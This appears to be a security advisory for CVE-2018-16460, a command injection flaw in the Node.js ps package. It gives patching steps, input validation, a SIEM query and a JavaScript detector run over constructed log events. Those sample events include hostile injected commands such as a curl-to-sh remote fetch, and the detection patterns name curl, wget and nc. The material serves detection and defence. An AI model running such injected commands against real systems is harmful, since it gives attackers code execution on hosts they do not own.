CVE-2018-16460

9.8 CRITICAL

📋 TL;DR

The ps package for Node.js builds a shell command from the PID value it is given. If an attacker controls that PID parameter, shell metacharacters in it are executed, giving arbitrary command execution on the host with the privileges of the Node.js process. Any Node.js application that passes untrusted input to the PID parameter of a vulnerable ps version (< 1.0.0) is affected.

💻 Affected Systems

Products:
  • ps package for Node.js
Versions: All versions < 1.0.0
Operating Systems: All operating systems where Node.js runs
Default Config Vulnerable: ⚠️ Yes
Notes: Any Node.js application that uses the ps package with user-controlled PID input is vulnerable.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

If the Node.js process runs as root (common in container images), the injected commands run as root: full system compromise leading to data theft, ransomware deployment, or complete system takeover.

🟠

Likely Case

Remote code execution allowing attacker to run commands with the same privileges as the Node.js process, potentially leading to lateral movement within the network.

🟢

If Mitigated

Limited impact if running with minimal privileges and proper input validation, though still dangerous due to command execution capability.

🌐 Internet-Facing: HIGH - Web applications that feed request data into the PID parameter can be exploited remotely, without authentication if that input is reachable before login.
🏢 Internal Only: HIGH - Internal applications remain vulnerable to authenticated users or attackers who gain internal access.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is straightforward: the attacker only needs to append shell metacharacters (for example a semicolon) and a command to the PID parameter; no memory corruption or timing is involved. Multiple public PoCs exist.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.0 and later

Vendor Advisory: https://www.npmjs.com/advisories/750

Restart Required: Yes

Instructions:

1. Update package.json to require ps version >=1.0.0 (for example "ps": "^1.0.0").
2. Run 'npm install ps@^1.0.0' or 'yarn upgrade ps@^1.0.0'. Note that a plain 'npm update ps' stays within the range already in package.json, so it will not cross from 0.x to 1.0.0 unless the range was changed first.
3. Restart the Node.js application; modules are loaded at startup, so the running process keeps the old code until restarted.

🔧 Temporary Workarounds

Input Validation and Sanitization

Platforms: all

Implement strict input validation on PID parameters so that only decimal digits are accepted, and pass the validated value (not the original input) on to the package

// JavaScript example: validate before the value reaches the package, then pass only the validated value on
const pidStr = String(pid);
if (!/^\d+$/.test(pidStr)) throw new Error('Invalid PID');
const safePid = Number(pidStr);

Package Removal

Platforms: all

Remove the ps package if not essential and use alternative process management methods

npm uninstall ps
yarn remove ps

🧯 If You Can't Patch

  • Run Node.js application with minimal privileges (non-root user)
  • Implement network segmentation to limit blast radius if exploited

🔍 How to Verify

Check if Vulnerable:

Check package.json or run 'npm ls ps' to see the installed version. 'npm ls' also lists copies pulled in transitively by other dependencies, which are just as vulnerable as a direct dependency; 'npm audit' reports any installed version matching the advisory.

Check Version:

npm list ps | grep ps

Verify Fix Applied:

Verify that every listed copy of ps is >=1.0.0 using 'npm ls ps', or check package.json and the lockfile; then confirm the application was restarted after the upgrade.

📡 Detection & Monitoring

Log Indicators:

  • Shell processes (sh -c, bash -c) spawned by the Node.js application whose command line contains 'ps -p' followed by shell metacharacters (;, |, &, backticks, $( ))
  • Unexpected child processes of the Node.js process (curl, wget, nc, id, whoami) or other suspicious command execution patterns in system logs

Network Indicators:

  • Unexpected outbound connections from Node.js process
  • Command and control traffic patterns

SIEM Query:

process.parent.name:node AND process.name:(sh OR bash OR dash) AND process.args:"ps -p" AND process.args:(*;* OR *&* OR *|* OR *`* OR *$(*)

Note: the injected command executes in the shell that Node spawns via exec(), so the indicator is a shell child of the node process, not the node process's own arguments. The original form of this query also lacked parentheses around the OR terms, so the OR branches matched regardless of the node/ps conditions. Wildcard and escaping syntax varies by SIEM; adjust the metacharacter terms accordingly.
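Added detection example, not part of the original advisory: the same logic as the query above, run over constructed ECS-style process-creation events. It flags shell children of a node process whose '-c' command starts with 'ps' and contains shell metacharacters, which is what an injected PID looks like once a vulnerable lookup runs through exec(). The event lines, field names and the set of shells are assumptions for the illustration.

```javascript
// Constructed sample events (not real telemetry), one JSON object per line,
// in the shape of ECS process.* fields as a SIEM might ingest them.
const SAMPLE_EVENTS = [
  JSON.stringify({ process: { name: 'sh', parent: { name: 'node' },
    args: ['/bin/sh', '-c', 'ps -p 4242'] } }),
  JSON.stringify({ process: { name: 'sh', parent: { name: 'node' },
    args: ['/bin/sh', '-c', 'ps -p 1; curl http://198.51.100.7/x | sh'] } }),
  JSON.stringify({ process: { name: 'bash', parent: { name: 'node' },
    args: ['/bin/bash', '-c', 'ps -p 7 && id > /tmp/o'] } }),
  JSON.stringify({ process: { name: 'sh', parent: { name: 'cron' },
    args: ['/bin/sh', '-c', 'ps -p 3; echo ok'] } }),
  JSON.stringify({ process: { name: 'node', parent: { name: 'systemd' },
    args: ['node', 'server.js', '--https'] } }),
  JSON.stringify({ process: { name: 'sh', parent: { name: 'node' },
    args: ['/bin/sh', '-c', 'ps -p $(cat /tmp/pid)'] } }),
  '{not valid json',
];

const SHELLS = new Set(['sh', 'bash', 'dash', 'zsh']);
// Characters that change how a POSIX shell parses a command string.
const METACHARS = /[;&|`$(){}<>\n]/;

// Extract the command string a shell was asked to run, i.e. the argument
// following "-c"; returns null when the process is not "shell -c <cmd>".
function shellCommandOf(proc) {
  const args = Array.isArray(proc.args) ? proc.args : [];
  const i = args.indexOf('-c');
  return i !== -1 && i + 1 < args.length ? args[i + 1] : null;
}

// True when a shell spawned by node runs a ps lookup that carries
// metacharacters. A legitimate lookup is "ps -p <digits>" and has none.
function isInjectedPsLookup(event) {
  const proc = event.process || {};
  const parentName = proc.parent && proc.parent.name;
  if (parentName !== 'node' || !SHELLS.has(proc.name)) return false;
  const cmd = shellCommandOf(proc);
  if (cmd === null || !/^\s*ps\b/.test(cmd)) return false;
  return METACHARS.test(cmd);
}

// Scan raw log lines; malformed lines are skipped rather than crashing the job.
function scanEvents(lines) {
  const hits = [];
  for (const line of lines) {
    let event;
    try { event = JSON.parse(line); } catch (e) { continue; }
    if (isInjectedPsLookup(event)) hits.push(shellCommandOf(event.process));
  }
  return hits;
}

module.exports = { SAMPLE_EVENTS, isInjectedPsLookup, scanEvents, shellCommandOf };
```

Running scanEvents(SAMPLE_EVENTS) returns the three injected command strings (the curl pipeline, the '&&' chain and the '$(...)' substitution) and ignores the clean lookup, the cron-spawned shell, the node process itself and the malformed line. Tune the parent-process and shell lists to your environment; an application that legitimately pipes ps output from a node child process will need an allow-list.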

🔗 References

📤 Share & Export